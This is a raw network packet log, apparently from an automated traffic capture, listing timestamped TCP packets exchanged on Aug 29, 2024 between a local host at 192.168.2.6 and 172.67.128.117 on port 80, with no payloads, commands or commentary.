                                    Aug 29, 2024 12:02:35.738759041 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739008904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739020109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739029884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739042997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739056110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739073992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739116907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739136934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739185095 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739332914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739345074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739356041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739367962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739378929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739389896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739394903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739394903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739409924 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739454031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739473104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739528894 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739639044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739650011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739659071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739670038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739702940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739702940 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739732981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739794970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739806890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739818096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739830017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739840031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739850044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739850044 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739902973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.739938021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739950895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739962101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.739991903 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740020037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740088940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740101099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740128994 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740161896 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740272999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740284920 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740294933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740309954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.740323067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740323067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.740349054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.778824091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778841972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778858900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778871059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778882027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778893948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778904915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778917074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.778980017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.778980017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.824738979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824781895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824795008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824805975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824812889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824824095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824836016 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824847937 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.824898005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.824934959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825103045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825154066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825193882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825205088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825216055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825227022 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825243950 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825251102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825251102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825256109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825268030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825278997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825297117 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825299025 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825310946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825321913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825328112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825328112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825387001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825455904 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825468063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825478077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825489998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825495005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825501919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825512886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825525045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825531960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825541973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825573921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825597048 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825716972 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825728893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825740099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825751066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825762033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825769901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825774908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825787067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825794935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825798988 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825805902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825812101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825834036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825848103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.825881004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.825881004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826029062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826040983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826050997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826062918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826073885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826081038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826081038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826085091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826096058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826107979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826113939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826118946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826131105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826141119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826144934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826158047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826172113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826172113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826205015 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826253891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826265097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826303959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826399088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826411009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826420069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826431990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826455116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826457024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826457024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826466084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826477051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826486111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826488018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826498985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826512098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826522112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826525927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826534033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826551914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826565981 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826590061 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826630116 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826642990 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826692104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826709986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826721907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826747894 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826769114 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826798916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826809883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826819897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826832056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826845884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826845884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826847076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826858997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826869965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826894045 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.826924086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826941013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826952934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.826965094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017246962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017261028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017266989 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017272949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017283916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017328024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017328024 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017388105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017400026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017411947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017425060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017469883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017585039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017596006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017606974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017617941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017618895 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017631054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017664909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017664909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017728090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017739058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017750978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.017784119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.017784119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018043995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018055916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018065929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018078089 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018090010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018100977 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018111944 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018116951 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018117905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018130064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018152952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018152952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018172979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018183947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018187046 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018219948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018219948 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018382072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018393040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018413067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018436909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018547058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018558979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018569946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018580914 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018580914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018594027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018604994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018615961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018615961 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018651009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018728971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018739939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018750906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018759966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018765926 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018771887 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018783092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018794060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018809080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018809080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018846035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018898964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018910885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018920898 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.018932104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.018971920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019090891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019102097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019112110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019123077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019134045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019139051 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019165993 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019184113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019289017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019299984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019310951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019323111 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019330978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019336939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019339085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019347906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019355059 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019361019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.019406080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.019406080 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054217100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054236889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054251909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054286003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054297924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054310083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054312944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054312944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054322004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.054366112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.054366112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105292082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105319023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105334044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105346918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105360031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105362892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105372906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105389118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105391979 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105432034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105443001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105443001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105444908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105454922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105478048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105492115 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105500937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105500937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105509043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105518103 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105521917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105549097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105549097 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105568886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105580091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105592012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105650902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105650902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105710030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105721951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105732918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105746031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105757952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105766058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105766058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105772018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105798006 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105811119 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105820894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105833054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105844021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105855942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105866909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105866909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105895042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105935097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105947971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105962038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105974913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.105978966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.105992079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106015921 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.106046915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106057882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.106070042 CEST8049717172.67.128.117192.168.2.6
